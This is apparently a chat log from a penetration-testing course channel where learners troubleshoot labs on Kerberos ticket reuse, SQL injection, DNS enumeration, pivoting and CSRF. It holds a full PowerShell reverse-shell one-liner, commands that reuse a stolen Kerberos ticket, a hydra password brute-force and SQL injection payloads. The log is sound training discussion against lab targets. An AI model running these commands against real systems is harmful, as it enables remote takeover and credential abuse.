#modules
please ignore. Just reset 2 more times and it worked XD
what question are you on ?
wait until i get there, i am retaking the module
eu2 worked for me...thanks @next bronze. Got it right away
svc_workstations@inlanefreight.htb@linux01:/tmp$ Is this it ?
yep, thats where the ccache files are
there are 2 files that belong to the user julio
might want to send a message to support about the target being broken
hmm yeah one of those should work, the no logon server status is weird tho, can you reach the DC from that target?
i'm doing Malicious SCF File
i'm not getting this users hash
wrote the scf file in backup
not sure, how could I test that? Other than with the command I'm already trying to issue
hey can someone explain to me why this injection worked for me ?
Executing query: SELECT * FROM logins WHERE username='tom' or '1'='1' AND password = '1' --'' AND password = ''; I'm at the subverting query logic in the SQLi fundamentals
Once you have the ticket you need to export it. export KRB5CCNAME=path_to_ticket.ccache . Then you can use other tools with the cached ticket of the user that has rights to do xyz. An example would be like netexec smb 10.10.10.10 -k -x “type C:\Users\julio\julio.txt” this would use the cached ticket to run a cmd and read that txt file but the -k flag can be used with most of impacket suite
at first i tried to make everything past password = '1' a comment, and then i noticed it added a ' to my syntax. i added another apostrophe and it worked
thinking of it, and trying it, making this another AND argument was useless so i removed it and it worked again
right, I was trying to run the command taught in the module, smbclient //dc01/julio -k -c ls -no-pass after the export command
Question, this is a loop from a reverse shell for powershell, and it makes me curious as to how the connection using this script doesn't get terminated if I don't send it a command for a bit, because wouldn't it evaluate it as if I sent data that is smaller than 0 in length? or does my computer just constantly send "im here" packets to notify?
heres the full code:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{attacker_machine}',{port_num});$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
I don't think you're doing anything wrong there, try changing vpn servers?
I am having trouble to remember myself how did i do it
tried already, like 4 or 5 times yesterday and 2 more today. It seems like there is something wrong with the server. I tried contacting support but got no response since yesterday
this smbclient command is the one shown in the exercise solution as well
root@linux01:/tmp# i am already root but i cannot remember how i did the flag
I used nmap to find 6 services. I enumerated them one by one, looked at anonymous connection, default credentials, CVEs, I even wrote my own exploit... I set up all the services on a VM to try some options... nothing... I wrote a Markdown page of all of my research but I don't know if I can share it here.
Sounds like you didn't find the correct service yet
If you want you can dm me them.
And I'll check. Don't wanna give a big hint away
hi anyone else having trouble getting a target to start?
it's taking forever
I'm just gonna come back to it later
see if things clear up
ok steps are like this, get the root and copy /tmp/krb5cc_647401106_UHrJ9h from julio, dont copy the HRJDux, export KRB5CCNAME=/root/krb5cc_647401106_UHrJ9h
smbclient //dc01/C$ -k -c ls -no-pass
this file /tmp/krb5cc_647401106_UHrJ9h does not exist in the server
it's for me, don't copy paste but LS /TMP
y7nah something
I have tried the export command with all of them already
yep, thats what I did here: #modules message
in the sequence of commands I sent in that print, I copy the files to root, then export, then try the smbclient and get the error
it works for me
right now?
did you see the last message
smbclient //dc01/julio -k -c ls -no-pass
julio.txt A 17 Thu Jul 14 21:18:12 2022
so ls /tmp and copy the second ticket to /root, not DUX something
cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
or whatever your name is, there are 2 julio's
dux and the real one
yes, that is exactly what I did
vim /etc/hosts
add this 172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01
:w for save :x for exit
smbclient //dc01/julio -k -c "ls" -N should be working
exporting the ccache file, I get the error:
after adding the register to /etc/hosts, still get the error with the same ticket:
smbclient //dc01/julio -k -c "more julio.txt" -N
still get the error:
root@linux01:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 ubuntu
172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb sm01
The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouts
rewrite the /etc/hosts
smbclient //dc01/julio -k -c "more julio.txt" -N
getting file \julio.txt of size 17 as /tmp/smbmore.FNGpCJ (16.6 KiloBytes/sec) (average 16.6 KiloBytes/sec)
I already have imported
import again
root@linux01:~# ls /tmp
krb5cc_647401106_HRJDux <- BAD
krb5cc_647401106_UHrJ9h <- GOOD but your might differ
go to /root, cd /root
cp /tmp/krb5cc_647401106_UHrJ9h .
export KRB5CCNAME=/root/krb5cc_647401106_UHrJ9h
klist
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_UHrJ9h
Default principal: julio@INLANEFREIGHT.HTB
hm. you did everything right but still there is a problem
exactly
that's why I asked if you were accessing the server right now. This might be a recent problem
how about i just give you the flag ?
I can see it in the Solution section, so its ok, but I would like to understand why it is not working
i followed the same steps and it works for me. i use EU2 VPN
I'll try changing to that one
save the steps in the notepad so you don't have to go all over again
but it works fine for me, so i am confused also
answer me this where did you change the /etc/hosts on your machine or in ssh session
@calm abyss it worked in the EU VPN! Seems like there is an issue with the US VPNs (I tried changing among the 3 US VPNs before, same issue)
@calm abyss thanks for the help!
can you make it now ?
yep, it worked, got the file
good to hear, keep on hacking
send a message to support, seems like a few things across modules aren't working
Hoping someone can point me in the right direction, in Attacking Enterprise Networks -> exploitation and privilege escalation. Having issues with the webserver, read some help here but still not working. I'm using proxychains with ssh dynamic port forwarding, Firefox and foxy proxy. My GET requests work just fine and the page loads within a second (I did clear my cache just to make sure it wasn't a false positive) but no matter what I do the POST request to log in or even the POST request to register an account sits there until I get a connection time out. I've tried restarting the boxes. I've tried my own box versus the pwnbox provided, I keep coming across the same issue.
There may be some interesting credentials in Internal Information Gathering that will help you log in.
Thx yeah I got those. My issue seems to be purely related to the proxy not sending my POST request. Even using the found information my POST request will just hang until it finally times out.
you don't need to set your foxyproxy/burp. just use Firefox manual proxy with Socks5 127.0.0.1 then your {PORT}
Can anyone please explain using HELO/EHLO to send commands to SMTP via Telnet? I read up on it in some other places but couldn't really understand much from the example they've shown in the Footprinting SMTP module
Has anyone else been experiencing targets stop responding when you're in the middle of something? I'm doing the Attacking Enterprise Network and I'm RDP'd into MS01 and then it freezes/crashes. Then, I try to RDP again and I get a black screen. Which I can't get back into until resetting again. I'm on reset 7.
Is it safe to assume to go with port 22
as port 80 is http and u cant get shell control with a http port
I had some issues earlier as well. Seems to come and go. Been especially seeing this more with any Windows labs
It's actually been very very bad. I do an action (making file or copying file) then it freezes. Time clock still works though. Then, I have to RDP back in. Then eventually it just stops letting me back in
Ugh - yeah - maybe it's a built-in feature from HTB to let us experience slow degrading connections - lolz
xD I was going to be finishing the whole course today, but with this happening. There isn't anyway hahaha
Oh
Yeah, thats awesome you're at that module!! - I have 13 more to go, finishing up AD Enumeration now , lab 1 assessment . Do you plan on scheduling the exam soon ?
Oh
I'll schedule it 6-8 months from now hahaha. I still have a lot to learn and not enough notes and experience. I'll be practicing writing reports for some of the ProLabs and going through a good many of the boxes. Then, I'll assess what I'm weak at and focus some attention there. Basically, what can I do blind and what can't I do blind.. Then, I should be ready by then. It took me 3 months to finish the whole thing. And 3 months of experience isn't enough I dont think lol
I think you are provided two exam attempts - maybe worth just to give it a shot - you never know! Either way - good luck on the path
Module: ADCS attacks
Section: PKINIT
Not sure what's wrong with the administrator.pfx
It's giving me error "Error outputting keys and certificates"
I tried it with pwn box as well, no clue whats going on.
Thanks! I'll get there eventually. I'm enjoying it 😄
can someone try to find the module for 10.129.200.169
why was no session created
Follow along with the module. It goes over the exploit and how to use MetaSploit. Also, that's linux and not windows.
providing the ip wont help on what module u doing
😵💫
ye ik its linux i used nmap and its on linux
I'm getting a BrokenPipeError: [Errno 32] Broken Pipe when I'm trying to download Inveigh onto MS01 on Lateral Movement for Attacking Enterprise Network. Is this an issue with how I set up my proxychains? I'm doing socks4 127.0.0.1 9050. I can't copy from my /drive:/home/htb/. I'm getting an expected error for that as well.
In the guide of the module you are exploiting a windows system. So, your exploit "linux/http/..." wouldn't work. The payload that is used in the module is (windows/meterpreter/reverse_tcp and the exploit exploit(windows/local/ms15_051_client_copy_image)
it wants a session
Attacking email services Q2. Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.
The command I'm using is ||hydra -l marlin@inlanefreight.com -P /home/inf0/HTBA/ACS/pws.list 10.129.98.248 pop3|| but it doesn't find anything
I tried it with rockyou and I tried changing the protocol but nothing works. Any tips?
Follow along with the module. You get the session prior to exploit.
which module is that?
Attacking common services
Wrong domain for email
I'm such an idiot
Get coffee 😄
Making a cup as we speak
😄 I just did as well. Going to be a late night
ATTACKING COMMON SERVICES
I got stuck in the question in the Dns module, I discovered a few subdomains but no result. blog,my,....
i also suggest deleting or redacting the username -- as it's a spoiler for q1
make sure your domain is inlanefreight.htb not inlanefreight.com
@fathom pendant Yes, I understand that, but I still can't find it.
as long as you didn't mess with the names.txt in subbrute, you should find it
Working in SNMP section of “footprinting” and stuck on last question. “Enumerate the custom script that is running on the system and submit its output as the answer ?” I don’t understand what they want in the answer. I’m using snmpwalk and found the other answers in section but I’m confused what they are asking for, on last question. Any help or further resources to look at would be really appreciated 🤙🏽
if you use snmp walk you should find that there's a .sh file that runs
@solar grove it's getting deleted by automod because it's detecting it as spam
I found these
www,blog,my,support,ns1
But I tried all of them I am looking for zone transfer failed error. I also wrote inlanefreight.htb in the etc/hosts file. I don't understand why it says ns1.inlanefreig.htb in the example.
try with the ip of the target instead
the examples won't always match up to the exercise 1 to 1
@fathom pendant I get python errors when I type the ip address
the command would look like ./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt
@fathom pendant My command is the same as this one and the result gives the domains they found (ns1,blog,my,support.inlanefreight.htb) but none of them are doing zone transfer.
that would be correct as none of those are the answer
I don't understand, this is not related to the answer I found, can you help me?
Yes found the .sh that’s running script but confused by directions if that file path is the output they are looking for or the oid # or both confused by the answer format they want @fathom pendant
just the output
if you follow a handful of the OID after the .sh that runs you'll see it's output
i'm telling you. that the answer is none of those, it is in the original names.txt that comes with subbrute
as long as you don't modify that, you're fine
i literally just ran it with only the ip in my resolvers.txt (ran it twice) and it worked
even adding the ns.inlanefreight.htb to my /etc/hosts and using that in my resolvers.txt instead gave me the expected answer
@solar grove dm me your output that you're getting
@fathom pendant I solved it but I don't understand why it works according to my head, can you inform me. I wrote ns1.inlanefreight.htb in /etc/hosts file and I used @ns1.inlanefreight.htb when transferring zone. why it didn't work on inlanefreight.htb.
because the nameserver isn't ns1
dig ns inlanefreight.htb @ip
then when you find the right subdomain it's dig axfr subd.inlanefreight.htb @ip/nameserver
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
but it shows it as a nameserver, which means it's a nameserver.
yes ns is the nameserver; not ns1
I get it, one question in my head is gone. My last question is where we discovered ns1.
?
Found it lol deff wasn’t expecting that kinda output thanks 🤙🏽
ns1 was never discovered in digging/enumerating the target IP
the ns1 was for inlanefreight.com <-- not .htb
inlanefreight.com is a real (fictional) website
bumpo
In Intro to Windows: NTFS vs. Share Permissions, I'm trying to mimic the instructions to mount a share using
"sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //10.129.156.61/"Company Data" /home/htb-ac-10648/Desktop/"
I have the firewall domains set to allow access on the Windows host (domains), and I have NTFS permissions set to full access for everyone, and Share permissions set to full control. But for whatever reason, I'm getting hit with a "No such file or directory" error. Spelling isn't the issue so I'm not sure what gives. Any advice?
I can access the share just fine with smbclient.
Note: I see the share on my pwnbox in Windows but not the Linux VM itself.
I'm starting to think this is expected behavior and the reasoning behind this is beyond the scope of this lesson?
"On the pwnbox in windows" you're using the in-browser pwnbox and your own vm?
If so: that's the reason for it breaking
The vpn assigns you an ip that causes network collisions and breaks things
You can only use one or the other for interacting with targets
Let me clarify; on the pwnbox via SSL VPN when RDPing into the Windows VM provided by the module
that didn't clarify anything
are you using the in-browser vm? yes or no
I literally do not know what "on the pwnbox via SSL VPN" means; you connect to the pwnbox either via the in-browser visual or via ssh to the public IP in its interface
no vpn required (it uses the vpn to connect to targets)
but you don't need to run the vpn on your own machine to use the pwnbox
the in-browser connects via SSL VPN....
"SSL VPN
This is essentially a VPN that is done within our web browser and is becoming increasingly common as web browsers are becoming capable of doing anything. Typically these will stream applications or entire desktop sessions to your web browser. A great example of this would be the HackTheBox Pwnbox." per Introduction to Networking: Network Types module
i understand what that means but YOU don't interact with the VPN
is what i'm saying
you're abstracting it too much
which is causing additional confusion
what i'm simply asking: are you running the VPN on your machine or not
web browser -> ssl vpn -> rdp into windows via pwnbox
So, no.
k
i just wanted to double check and verify that you weren't running the VPN on your machine, which will cause conflicts in things not working properly
as far as the connection thing goes, have you tried wrapping the entire connection in double quotes
i.e. "//ip/share name"
I have, yes. Same error
can you connect to it via smbclient?
I see the share using net share on the Windows RDP session, but not on the Pwnbox VM itself.
Also yes. I can both list and interact with the shares
then it's mostly working as intended: Sharing resources doesn't generally mean you can mount them
depends on how they're shared and set up
you generally can't mount an smb share to linux
Ahh that makes sense then. I think my expectations were off, then.
Thanks for your time.
And your frustration.
😉
Anyone had issues spawning targets in academy, getting time out errors?
all day
once
started this hour
I have a problem with my VPN since yesterday. I think the problem is in this lesson only
try pwnbox
okay
https
it's http://
not an issue with vpn
literally wrong protocol
https is usually fine on htb
i don't recall a module that you couldn't use https but i could be wrong
most use http
most of the time http doesn't work i found
several times in fact https is the one that causes the issue
When there is no good connection it automatically redirects it to https
maybe on the ones that are launched via docker are https fine
scan it to see if it's on an alt port
then it sounds like your vpn died
ps aux | grep openvpn to see if it's running
also if you didn't run it with sudo it likely died in the bg without you noticing
your ifconfig picture didn't show a vpn connection
sudo killall openvpn
okay
you have multiple instances running
i see 3 instances of root running openvpn
so yes: that's multiple instances
either way
👆
ok try on yr box
u can see like that
if i run on my box it'll only ever show one + me running the grep command
especially considering different PIDs
Just killall as suggested or reboot and reconnect
i just run my alias not 3 vpn vhtb
well your alias seems to be spawning a few
okay i'll try again
try running it manually instead of with your alias, just to make sure
my alias
ok?
we're not arguing your alias atm
https://superuser.com/questions/117913/ps-aux-output-meaning > from your output i'm seeing multiple PIDs for the openvpn process
3303 --> 3305
after reboot still
ok
PID means Process ID, which is in the 2nd column of the ps command you ran, you can see they have different PID numbers, which means they are different processes
so something is causing issues
follow the command MarcieLee gave you, sudo killall openvpn
Do you have it in bashrc or something, and then executing again
do you have an automatic process that's running it?
then reconnect, try again, if that doesn't work, reboot your whole pc and try reconnecting and doing it again
Multiple terminal windows?
that makes sense why my guide didn't work for you yesterday
your multiple VPN's are causing problems, kill all those processes and just run it once
tmux
Hi guys, I'm having an issue with Tomcat in module Shells & Payloads under "The Live Engagement". Every time I try to upload the .war file in Tomcat it goes to "The connection was reset".
Brother you were given the steps to resolve, execute them!
I did this and it did not work, but I will try to change the vpn file . thx bro
you need to resolve all the openvpn's that are open first
kill the processes, then reconnect to the vpn
might need to attach -9 to the killall command
When I kill the VPN and then try to run it, three other similar processes appear. I don’t know where they are coming from.
Sounds stupid.. but the IP / port listed in your config file
Can you actually connect to it
i have the same IP and can ping it
but i'm not actually getting it to fully connect; regenerating my vpn file now tho
They're on TCP
yeees
sudo kill -9 openvpn right ??
killall*
So when I said do you have that in bashrc, do you have the command to connect to the VPN in bashrc so it does it automatically when a session is started?
Or just the alias
alias
ok yeah can confirm running it does spawn 3 PIDs
i found this .and idk
question
when you run it: do you get: "Initialization Sequence Completed"
if not; that's why you don't get a tun0
@ocean night this might be related to US acad vpn server maintenance as well; considering this is the first time i'm running the connection since the maintenance period
maybe for testing comment all of your custom stuff out and just try manually
that's why you're not getting a tun0
idk
regenerate your vpn file (Download a new vpn file) and use that
okay i'll try
literally just downloaded a new config and it worked
old config hung at connecting to IP
that's definitely a word there
my old config was UDP
i'm shrimply stating that it's likely with the maintenance being done, a new file was needed :)
Could well be
oop and just got another idea >:)
thx
What did it in the end?
download a new file
and it worked
thx MarcieLee 💚
anyone having trouble getting RDP access to machines in the ACTIVE DIRECTORY ENUMERATION & ATTACKS module? Stuck on Living Off the Land. Have tried swapping VPN servers 2x
it's letting me connect but just showing a black screen on the RDP client
aha
thank you @cloud urchin !!
tried clicking on it but didn't try the old trusty keystroke d'oh
it's around the lower 2/3 of the screen centered
i have a question about the fawn module in the getting started list, i was wondering if someone could help me understand. the walkthrough for the module says the help for the ftp is "ftp -h" but it stated it was an invalid command. "ftp ?" worked instead and i just wanted to understand why. is it an update to something or did i do something wrong from the walkthrough?
Wrong channel
of course. thank you.
This channel is for academy modules
Windows or linux
Windows uses ? Or /?
thats my bad for the wrong channel
it stated it was unix
Yes; but I mean when you tried on your machine
oh. linux
Getting the following error whenever I try to answer the first question of the "Kerberoasting - from Linux" module in AD Enumeration & Attacks - anybody else having this problem?
[-] Principal: INLANEFREIGHT.local\SAPService - [Errno 104] Connection reset by peer
Edit: 3 target resets later seems to have done the trick 😄
Not sure how long you waited before rebooting, but the AD modules take a bit longer to fully boot up, so make sure to wait 3-5 min.
Module name : Pivoting, Tunneling, and Port Forwarding
Section name : Web Server Pivoting with Rpivot
"New connection from host 10.129.162.202, source port 39110" this means i already succeed in the pivot part right?
i want do nmap scan in the 172.16.5.0/23 but it always timeout . why?
Yes
Sounds like your Rpivot is set up, so the next logical thing that would stop it is your proxychains configuration
Depending on your pivot you'll either need proxychains or whatever method by your tool
i used proxychains
proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.0:80 <--socket error or timeout!
172.16.5.0 is a bad address
the module says to use 172.16.5.135:80
try using that IP instead
not working .lots of "socket error or timeout!" error
you can proxychain to a service locally and use 127.0.0.1 to make sure it's set up correctly. maybe re-download the vpn, reconnect to the vpn, and restart the lab machine then wait ~3-5 mins to connect and try again
If we know the username is admin
then we should use ' or '1'='1 with password to bypass
why it is using with admin ?
as long as your syntax, targets, proxychains, vpn, etc are all set up and enabled correctly it will work
Guys
Any Idea????
Because he is the admin and has high priv
Imagine that you want to rob the bank. What would be better, to be the bank manager or to be just an ordinary person working in the bank?
but what if I change admin to other username?
If you know which user, you will succeed
I advise you to study more carefully because it explains all of this
it seems to be a sqli example, in this case it's saying if it's running as admin and we did an OR statement with 1 = 1 then it will bypass the password bc 1 does in fact equal 1. OR statements just see if one of the two things, in this case admin or 1=1, is true, then allow
why make 2 cases if it's already known that the username is admin
it would accept admin as username and password should be used with 1=1 to bypass it
yeah just bc u know the username doesnt mean u know its password so thats why with the sqli u did an OR statement to bypass entering the correct pass
then it should be like this
/users/user[username/text()='admin' and (password/text()='abc' or '1'='1')]
ooh
yeah it could be
Saving passwords plaintext is like the worst thing any DBA/developer can do
of course
By putting a comment after the entry of username the rest of the query won't be processed as it would be a comment
Anyone solved Error-Based SQL injection from the Advanced SQL Injections module.
I was able to figure it out because of the hint and obvious title on the webpage, but how on earth would I have known what to search for based on the nmap scan??
Getting Started/Pentesting Basics/Public Exploits
which module is that? is that the cow?
looks like getting started, next time include the module and section name
Getting Started/Pentesting Basics/Public Exploits
there's a port given for the target, so you'll only need to examine the port and not the whole IP
yea a lot of times nmap won't give you all the info. so you need to get on that website and look for interesting/info stuff yourself
How do you examine just that port?
with a browser, nginx is a web server, so to interact with web servers, you'll need a browser
later modules will teach you how to footprint different services
So I should NOT have been able to figure that out without the hint?
well it's a web server. you just visit it with the correct port (80 or 443 (http or https))
xreous was saying that later modules will teach you how to footprint other services like imap, snmp, pop3 etc
you don't need the hint, go to the website, see the plugin version, google <plugin version> exploit. that's all
Without the hint how would you know what to look for?
How would you go about solving that question?
What's this??
what I said, google the version shown in the website and try an exploit
U have to be smart to understand
That’s basically the hint.
I mean just from enumeration…
huh? you don't need the hint to google the plugin version
it's right there on the website
he probably means how do we know we need to visit the website?
oh
lol.
I already have the answer.
I’m saying, why would you think to google that??
this
to google the plugin name?
because a lot of outdated plugins have vulnerabilities, and the name of the plugin is served to you on a golden plate in this exercise.
it's always important to know the name and version of stuff running on every service
Right!
But of course it won’t be given on a golden plate. (In real life)
They teach you to find open ports through enumeration.
How would you even know that if it weren’t written on the front of the webpage??
that's gonna be taught to you in later modules. this one was served to you on a golden plate.
hence I said later modules will teach you how to footprint services better, this module is easy mode where the version number is right there on the website
this module you're doing is just getting started. it won't teach you much deep stuff
Right… ok lol
I’ll leave it at that for now.
But I was saying I shouldn’t have expected to ever solve that without the hint. (At this point)
why not? googling is not rocket science. the module itself literally told you to google exploits, so you see the version number, google that + exploit
🙄 lol.
So what would you google?
Try to find information on the webpage itself
You have been given an IP and port, visit it and observe
did you look at the website with your browser like I suggested
I did.
There is nothing there.
Try again, don't swerve your attention elsewhere
whatever I see here
Should have made the title bigger
I mean, now I know about “plugins”.
But you wouldn’t think to do that at first.
The module teaches you about enumeration and finding exploits on the open ports.
Nothing that comes up in the open ports would lead you to do that.
you're only given 1 port to work with
No (good) information comes up on that port.
Https?
you need to get better at googling ig 
Why would I think to google simple backup plugin 2.7.10 from this?
if you google apache, what do you see? it's a http server (also in the nmap scan), so for http servers, you interact with it using a browser, when you go there using a browser, you're shown the plugin version
I feel like we're going in circles, if you're so set on believing that this section cannot be completed without the hint, so be it. good luck with future modules
Read the contents on the webpage and don't focus on scanning
As was stated before, this is given on a golden plate.
What would you do in a normal situation?
Google what you see and add the word exploit or vulnerability
as I've said for the 3rd time now, future modules will teach you how to footprint services
lol the answer isn’t usually going to be written front and center on the page.
Further down the modules you will be shown how to enumerate
This is, as the name of the module suggests, getting started
You won't be expected to do something a bit more difficult
Right!
And I’m just curious how one would have solved this without the answer basically given to you…
Got it.
But @next bronze is saying I don't know how to google, etc etc lol.
the future will tell
lol.
Nice chat guys.
👌🏽
anyone able to help me with something at the start of the introduction to windows evasion?
i need help in the windows evasion module getting the AES crypter to work
i think i've set it up wrong, wondering if someone can look at my code
if you could please DM me
hey all how to reset my neo4j user&pass
hello, so i'm trying to answer this question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. here is the command i came up with to try and find the good answer : curl "https://www.inlanefreight.com" 2>/dev/null | grep -oE "https://www.inlanefreight.com(/[a-zA-Z0-9./?=_-]*)?" | sed 's|https://www.inlanefreight.com||' | sort | uniq | wc -l. I cannot figure out how to do it differently, I really need help on this one. Thanks in advance
I mean there's not much to do differently
It's a bunch of filtering and finding references to inlanefreight.com and filtering
Though I don't recall sed using | rather than /
Which you'll need to escape special characters
(Note it helps if you put your command in backticks so it's easier to parse)
`like this`
This one I used a fair bit of googling and mostly copied a command I found on the forums
I see, thank you for your answer! I tried using sed differently but still can't find the correct answer, this is so annoying. Thanks again for the advice though!
Yes I forgot to do it ^^ my bad
I need someone to drop some knowledge on me about SSH tunneling. I'm doing Attacking Enterprise Networks and I have admin hash. I'm trying to connect to the DC with this hash. However, I keep getting a HTTPClient timeout error or HTTPResponse Error. I'm able to ping and nmap scan the DC. I've tried using msfconsole autoroute and chisel to SOCKS tunnel traffic, and using ssh -D {port} and using proxychains as part of the argument in my command to connect to the DC. I've googled until I can drop on fixing the issue. Could this be a technical issue with the target or issue with my socks tunnel or /etc/proxychains.conf or something else entirely?
Yeah but for some reason you are using pipes | in your sed and not /
I thought that sed was using these delimiters | and not /? Wouldn't that be confusing with the urls?
Well you need to escape special characters
Sed uses / between its arguments
So you'd need to format http:// as http:\/\/
Which escapes the / character
So it doesn't get interpreted as ending the statement
Anyone having issues with the VPN?
https://linux.die.net/man/1/sed [man sed]
like this? curl -s "https://www.inlanefreight.com/" | grep -oE "https://www.inlanefreight.com(/[a-zA-Z0-9./?=_-]*)?" | sed 's/https:\/\/www\.inlanefreight\.com//' | sort | uniq | wc -l
It works fine with me
Try generating and downloading a new vpn file
I tried regenerating. The TLS handshake keeps failing. I'll try a different server.
I still get the same answer :/ I think I'm just gonna pass on this one
Hey, I have a slight query using gobuster. Here I used a patterns file, but gobuster isn't even following the pattern I gave it
the patterns file
Just search the forums for a command
This one includes an explanation
There's a simple and slightly more complex command in the forums
Thank you so much. I didn't know there were so many responses available on the forums. I will look it up more often
Np you're likely to find a bunch of info on tier 0 modules
Tried 2 EU servers and 2 US servers. Then tried returning to an old snapshot of my VM and it still doesn't work 
I also suggest running the command one pipe at a time to see what it's doing
Sure I will do it. I am a bit familiar with all these commands separately but combining them is quite new to me
Hey guys, is there a way to run ubuntu+gui in docker ?
Probably. You'd just need to open an rdp port for it
Likely a few google searches can get you there
Who do I contact if I'm still having issues with the VPN?
Yes
Where's support? 😅
There's a green bubble in bottom right of academy
Need to speak to a person? Learn how to reach our support via HTB Labs.
Thanks
I for the life of me cannot spot the green bubble 💀
Disable adblock then
Thanks, found it.
module: Session Security, section: CSRF (GET-based). If csrf.htb.net was utilizing SSL encryption, would an attacker still be able to alter Julie Rogers' profile through CSRF? Answer format: Yes or No
I mean the answer is likely in the reading
when i set answer to yes it is right
And the section likely explains it
It's also helpful to express your confusion about something rather than just reposting the question
this is wrong because if we are on the local network we are unable to sniff https traffic, so how could an attacker gain the csrf token??? if anyone has knowledge about it tell me, the module name is session security, section: csrf (get based)
Describes the cross-site request forgery (CSRF) attack and how to implement anti-CSRF measures in ASP.NET Web MVC.
Hope these help clear up any confusion
Tldr the csrf can still send https://
@fathom pendant but at the start of the section they write: Similar to how we can extract session cookies from applications that do not utilize SSL encryption, we can do the same regarding CSRF tokens included in unencrypted requests.
It likely later explains that it's still possible with ssl
Again I provided 2 additional resources that explain that ssl does not inherently prevent csrf
As the malicious site can just send the request as https:// instead of http://
because they write it in a way where the attacker first has the csrf token of the victim, which is only gained by network sniffing, so it means that if we sniff https traffic we are able to get the csrf token of the victim???
You might not sniff it over the network but the data is decrypted at the end point, you don't need to see its transit
Usually csrf gains tokens via some form of malicious form
Not generally just by sniffing
but in the particular section they write at first
Ignore the at first portion
You're focusing too much on that
I'm telling you: typically csrf is attained via malicious web form, not by sniffing
In which case sniffing does not matter
that they intercept the request using burp, then capture the csrf token of the victim, then use it to mount the attack
sigh
At least read the additional resources I linked to gain more insight
Instead of trying to argue about the examples
@fathom pendant i understand you but the context i'm telling you about is different. in that section, how would an attacker gain the csrf token of the victim if he does not sniff the network? you tell me???
sighs by having the victim visit a malicious site which will capture the tokens
As cookies are always sent with any http(s) request
but in the section they first capture the csrf token of the victim, then use it to write the attacker-crafted web page
I'm done trying to further explain it when you're extremely hung up on the example
Also burp isn't a sniffer
It just intercepts traffic
So it doesn't see the request the same way something like Wireshark would
With burp, the traffic is already decoded
i know burp is not a sniffer, they just tell it that way, two users on the same network
Just nevermind
Point is. Csrf is still possible
Both links I provided earlier state https alone is not enough to prevent csrf
to exploit csrf these conditions must be met: 1: session based on cookie only, and 2: no unpredictable parameter. in this case the csrf parameter is unpredictable by the attacker, so how can he exploit it???
They likely explored the webpage itself to see what the vulnerable parameters are then crafted a malicious site based off that
If there's a csrf token, then yes it's harder
But https doesn't magically make a csrf token
It just puts the ssl layer on the webpage
That's it. Ssl doesn't inherently magically add things
The question was simply "if ssl is enabled can you still csrf" which you can
Not "if csrf tokens are implemented"
there is a csrf token that they used to make the attacker web page with the same value as the victim's csrf token, then serving it to him to perform csrf
they just copy paste the value
Also: it's not asking how its asking if and later sections likely explain it
which is not possible in the real world
can you tell the scenario of the attack
A vulnerability in uTorrent and BitTorrent, which is using uTorrent's core, was discovered today that affects the BitTorrent 6.0 client, uTorrent 1.7.x, uTorrent 1.6.x and uTorrent 1.8-alpha-7834. The Denial of Service vulnerability is made possible by the way the clients handle user data.
Anyway. Point is
All sources say it's possible with https
Because ssl alone isn't enough
Usually other stuff would be added on top of https that would mitigate or prevent
for getting local admin on ad attacks skills assessment ii, on the sql01 host, is the intended way supposed to be abusing one of the privileges the user has
i've left the talk about ssl or without ssl, i'm just telling how they say it could work in a local network
Potatoes can be delicious, and printers like to be spoofed
do they really?
Brother, it's the same principle
In this instance, yes 😄
they are wild
@fathom pendant the resource you shared is verb tampering
You're overcomplicating the simple question
????? All resources articles state csrf and the link to the utorrent attack was referenced in the owasp page I linked
the last question
in the particular section, what they want to convey is like: first they write the attack scenario in a local network, then in the middle they capture the victim's request and copy the csrf token and paste it to perform the attack, and at the end they say they are able to change the victim's profile if ssl is implemented
@fathom pendant i am not saying anything is right or wrong, i just want to figure out the content written in the section
The section does not mention ssl, so that part requires research
Which takes maybe a few seconds to google
Which all i did was google "does https prevent csrf" and "is csrf possible with https"
@fathom pendant i suggest you to skim the section in free time
I am looking
And as I said, while it doesn't mention ssl
Research will tell you the answer
And tell you why
Which is mostly unrelated to the question
As it boils down to, csrf and https
Which if you extrapolate that it's possible in general with ssl --> it's possible in the hypothetical
@fathom pendant can you tell me the whole attack scenario of the section, put aside the question, only tell me what they want to convey by writing csrf in get based
Ugh
It's literally the same attack, but with https/ssl instead of http
That's it
so how would you get the csrf token in the real world??? to replicate the same process that they write
sighs
You would visit the website and log in to your account/a test account. Visit a self hosted page or something like that while intercepting the request to see if, in-fact there's no randomized tokens or any anti-csrf measures in place
If not then boom you launch a social engineering attack to get a logged in user to visit your malicious page and get their token
By viewing the types of requests at play, i.e. get, you can then craft malicious payloads that would then perform actions on behalf of the user, such as changing their password
Ssl only just acts to tell the browser it's using https
That's it
@fathom pendant but in that case there is csrf token
Then you can't do it, if it's a randomized token. But again that wasn't the question as originally posed
:p if any anti-csrf measures are in place then it makes it virtually impossible
Also there's a section
remediation advice which goes over prevention methods
so see all the questions above, i am asking you how to get the csrf token. so in which context do they write the section get based csrf if we could not mount it in real life
I don't think I quite understand your question
It's likely the module uses a cookie labeled csrf that isn't actually randomized
